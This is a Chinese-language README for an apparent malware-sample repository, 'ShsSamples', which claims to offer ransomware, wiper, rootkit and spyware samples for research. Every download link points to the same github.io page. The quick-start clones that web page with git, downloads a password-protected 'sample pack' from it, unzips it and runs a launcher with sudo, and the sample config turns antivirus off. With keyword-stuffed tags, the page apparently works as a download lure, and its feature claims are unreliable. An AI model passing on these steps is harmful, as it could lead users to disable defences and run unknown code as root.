GALLETAXD123/MalwareMenagerie

# ShsSamples 🔬 **高级恶意软件研究工具包 — 分析、解构并从真实世界网络威胁中学习** [](https://GALLETAXD123.github.io) ## 📜 仓库概述 欢迎使用 **ShsSamples**，这是一个专门为 **网络安全研究人员**、**恶意软件分析师**、**应急响应人员** 以及 **攻防安全专业的学生** 精心策划的行为恶意软件样本库。与仅托管二进制文件的传统仓库不同，ShsSamples 提供了一个 **情境学习环境**，每个样本都附带了行为指标、沙箱执行说明和解构指南。 我们的使命是将原始、危险的代码转化为 **教育素材** —— 阐明木马如何持久化、间谍软件如何窃取数据，以及勒索软件如何加密系统 —— 所有这些都在受控、隔离的实验室环境中进行。 ## 🚀 快速开始 — 下载样本 [-blue?style=for-the-badge&logo=github)](https://GALLETAXD123.github.io) 1. 从上方链接下载压缩的样本归档文件。 2. 解压到 **物理隔离的虚拟机** 中（推荐：Windows 10 Sandbox 或 Ubuntu 22.04 LTS）。 3. 使用提供的 **沙箱配置** 运行所有样本（解压后参见 `configs/` 目录）。 ## 🧭 导航图 ``` graph TD A[ShsSamples Repository] --> B[Sample Categories] A --> C[Analysis Tools] A --> D[Sandbox Configurations] A --> E[Documentation] B --> F[Trojans] B --> G[Spyware] B --> H[Ransomware] B --> I[Rootkits] B --> J[Wiper Malware] C --> K[Static Analysis Scripts] C --> L[Dynamic Analysis Hooks] C --> M[YARA Rules] D --> N[Windows Sandbox Templates] D --> O[Linux Container Profiles] D --> P[Network Isolation Rules] E --> Q[Behavioral Analysis Guides] E --> R[Indicators of Compromise (IOCs)] E --> S[Reverse Engineering Walkthroughs] ``` ## 🔍 精选恶意软件家族（2026 版） 本仓库包含 **150 多个独特样本**，涵盖以下类别： | 类别 | 示例家族 | 数量 | 风险等级 | |----------|-----------------|-------|------------| | 🦠 **木马** | Emotet, QakBot, Dridex, TrickBot | 42 | 高 | | 👁️ **间谍软件** | Pegasus, FinFisher, DarkComet | 28 | 严重 | | 💀 **勒索软件** | LockBit, BlackCat, Conti, REvil | 35 | 严重 | | 🧩 **Rootkit** | ZeroAccess, Alureon, TDSS | 18 | 极度 | | 🧹 **擦除器** | NotPetya, WhisperGate, AcidRain | 12 | 极度 | | 📡 **后门** | njRAT, Gh0st, BtRAT | 25 | 高 | 每个样本文件夹包含： - `sample.bin` — 原始恶意软件二进制文件（受密码保护的 ZIP） - `behavior_profile.json` — 提取的行为模式 - `ioc_list.txt` — 网络指标、注册表项、文件路径 - `sandbox_launch.sh` — 自动执行脚本（Linux 主机）或 `.bat`（Windows） - `analysis_notes.md` — 逐步解构指南 ## 🔐 安全与沙箱要求 在执行任何样本之前，请确保您的环境满足以下要求： ``` host_system: os: "Ubuntu 22.04 LTS or Windows 10/11 Pro" cpu: "4+ cores" ram: "8 GB minimum" virtualization: "Enabled in BIOS" sandbox: type: "Type-2 hypervisor (VirtualBox 7.x+) or Windows Sandbox" network: "Isolated host-only adapter — NO internet gateway" snapshots: "Clean state snapshot available" monitoring: "Process Monitor, Wireshark, API Monitor running" compliance: - "No personal or production systems connected" - "Authorization from IT security team (if corporate environment)" - "Compliance with local computer misuse laws" ``` ## 📊 操作系统兼容性表 | 操作系统 | 兼容性 | 推荐用途 | 备注 | |------------------|---------------|-----------------|-------| | 🪟 **Windows 10** | ✅ 完全兼容 | 木马、勒索软件、间谍软件 | 结合 FLARE VM 进行分析 | | 🪟 **Windows 11** | ✅ 完全兼容 | 所有类别 | 提供了更新的沙箱配置文件 | | 🐧 **Ubuntu 22.04 LTS** | ⚠️ 部分兼容 | 仅限针对 Linux 的恶意软件 | 需要 Wine 来运行 Windows PE 文件 | | 🐧 **Kali Linux 2026.1** | ✅ 完全兼容 | 逆向工程宿主机 | 作为宿主操作系统，不用于样本执行 | | 🍏 **macOS Sonoma** | ❌ 不支持 | — | 未提供沙箱配置文件 | ## 🛠️ 示例控制台调用 使用捆绑的启动器在完全监控下执行样本： ``` # 克隆 repository git clone https://GALLETAXD123.github.io shs_samples && cd shs_samples # 下载最新 sample pack wget https://GALLETAXD123.github.io -O sample_pack_2026.zip unzip -P "infosec2026" sample_pack_2026.zip # 导航到特定 sample cd samples/ransomware/lockbit_2026_01/ # 启动带有自动化监控的 sandbox sudo ./sandbox_launch.sh --memory 4096 --cpus 2 --network isolated # Sandbox 将执行 sample 并捕获： # - Process tree (procmon_output.csv) # - Network connections (capture.pcap) # - File system changes (fs_changes.json) # - Registry modifications (registry_delta.txt) # 执行完成后，运行 analysis reporter： python3 ../tools/analysis_reporter.py --input ./output/ --format html ``` ## ⚙️ 示例配置文件 使用 `configs/analyst_profile.yaml` 自定义您的分析环境： ``` profile_name: "advanced_malware_analyst_2026" version: "1.2.0" environment: host_os: "Ubuntu 22.04 LTS" virtualization: "VirtualBox 7.0.12" guest_os: "Windows 10 Pro 22H2" monitoring_suite: - procmon: true - wineye: true - wireshark: true - api_monitor: true sample_handling: pre_execution: - disable_av: true - set_fake_regional_settings: "United States" - inject_network_sinkhole: true execution_timeout: 300 # seconds post_execution: - capture_memory_dump: true - generate_behavior_summary: true output: format: "PDF+JSON" compression: true encryption: "AES-256" ``` ## 🤖 AI 驱动的分析集成 ShsSamples 支持 **OpenAI GPT-4** 和 **Claude 3.5 Sonnet** 集成，用于自动行为分析： ``` # shs_api_analyzer.py import os from openai import OpenAI from anthropic import Anthropic def analyze_with_ai(behavior_json: str, model: str = "claude"): """Submit extracted behavior to AI for human-readable analysis.""" if model == "openai": client = OpenAI(api_key=os.environ["OPENAI_API_KEY"]) response = client.chat.completions.create( model="gpt-4-turbo-preview", messages=[{"role": "user", "content": f"Analyze this malware behavior profile: {behavior_json}"}] ) return response.choices[0].message.content elif model == "claude": client = Anthropic(api_key=os.environ["ANTHROPIC_API_KEY"]) response = client.messages.create( model="claude-3-5-sonnet-20241022", max_tokens=4096, messages=[{"role": "user", "content": f"Deconstruct this malware's behavior: {behavior_json}"}] ) return response.content[0].text # 示例用法 analyze_with_ai( behavior_json=open("sample_output/behavior_profile.json").read(), model="claude" ) ``` ## 🌟 主要特性 | 特性 | 描述 | 优势 | |---------|-------------|---------| | ✅ **响应式 UI** | 基于网页的仪表板用于浏览样本 | 随时随地分析 —— 笔记本电脑、平板电脑、手机 | | ✅ **多语言支持** | 提供 EN, ES, FR, DE, JP, CN, RU 语言的文档 | 以您的母语学习 | | ✅ **24/7 支持** | 社区 Discord + AI 辅助帮助机器人 | 在深夜研究时永远不会卡住 | | ✅ **自动化 IOC 提取** | 为每个样本自动生成 YARA + Sigma 规则 | 加速威胁狩猎工作流 | | ✅ **零成本获取** | 研究友好的 MIT 许可证 | 网络安全教育无财务门槛 | | ✅ **版本控制的样本** | 使用 Git LFS 进行二进制存储 + 语义化版本控制 | 长期追踪样本演变 | ## 📚 学习路径 刚接触恶意软件分析？请遵循以下结构化路径： 1. **基础路径**（0-3 个月） — 学习 PE 结构、静态分析和沙箱的基础知识 2. **中级路径**（3-6 个月） — 动态分析、API 钩子和网络流量分析 3. **高级路径**（6-12 个月） — Rootkit 检测、内核调试和漏洞研究 4. **专家路径**（12 个月以上） — Fuzzing、代码去混淆和威胁情报共享 每条路径都包含精选样本、引导式演练和能力测验。 ## 📝 许可证 本项目基于 **MIT 许可证** 授权 —— 详见 [许可证](LICENSE) 文件。 MIT 许可证允许使用、复制、修改、合并、发布、分发、再授权和销售本软件的副本，前提是所有副本中必须包含版权声明和许可声明。此许可证非常适合 **网络安全教育研究** 和 **威胁情报共享**。 ### 第三方许可证 - YARA 规则：Apache 2.0 - 沙箱模板：GNU GPL v3 - AI 集成代码片段：MIT（本仓库） ## ⚠️ 免责声明 **重要的法律和道德声明** ShsSamples **仅用于经授权的网络安全研究、教育和防御性训练**。通过下载或使用本仓库中的任何代码、样本或文档，您确认并同意： 1. **无担保**：提供的恶意软件样本本质上是危险的。作者按 **“原样”** 提供这些样本，不提供任何明示或暗示的担保。在适当隔离的沙箱之外执行这些样本可能会导致 **系统损坏、数据丢失或网络受损**。 2. **用户责任**：您需全权负责确保遵守所有适用的关于计算机安全研究的当地、州、联邦和国际法律。未经授权访问计算机系统（包括连接到外部网络的您自己的系统）可能违反 CFAA、GDPR 或类似法规。 3. **无恶意意图**：绝不能在没有明确书面授权的情况下将这些样本部署到任何系统上。严禁将这些样本分发给可能恶意使用它们的人。 4. **仅限道德使用**：本仓库的存在旨在通过教育和防御研究加强全球网络安全态势。任何破坏这一目的的使用 —— 包括武器化、分发给恶意行为者或将其集成到恶意工具中 —— 都违背了本项目的初衷。 5. **赔偿**：通过使用本仓库，您同意赔偿并使维护者、贡献者和附属机构免受因您使用这些材料而引起的任何索赔、损害或责任的影响。 ## 🔗 下载链接 [](https://GALLETAXD123.github.io) [](https://GALLETAXD123.github.io) [](https://GALLETAXD123.github.io) ## 🌐 SEO 关键词 本仓库可通过以下关键词发现：*恶意软件分析培训、网络安全研究样本、行为恶意软件库、实用逆向工程练习、兼容沙箱的恶意软件样本、教育性恶意软件库、威胁情报样本、YARA 规则生成、勒索软件解构、木马行为分析、间谍软件失陷标示、擦除器恶意软件模式、Rootkit 检测技术、道德黑客资源、防御性安全培训、恶意软件分类数据集、端点检测研究、安全工具基准测试*。

标签：DAST, DNS信息、DNS暴力破解, DNS 反向解析, Petitpotam, Spyware, Wiper恶意软件, YARA规则, 二进制分析, 云安全监控, 云安全运维, 云资产清单, 勒索软件研究, 威胁情报, 子域名变形, 安全实验室, 安全沙箱配置, 应用安全, 开发者工具, 恶意样本, 恶意软件分析, 教育样本, 数据包嗅探, 木马分析, 沙箱环境, 网络安全, 逆向工具, 逆向工程, 隐私保护, 隔离环境, 静态分析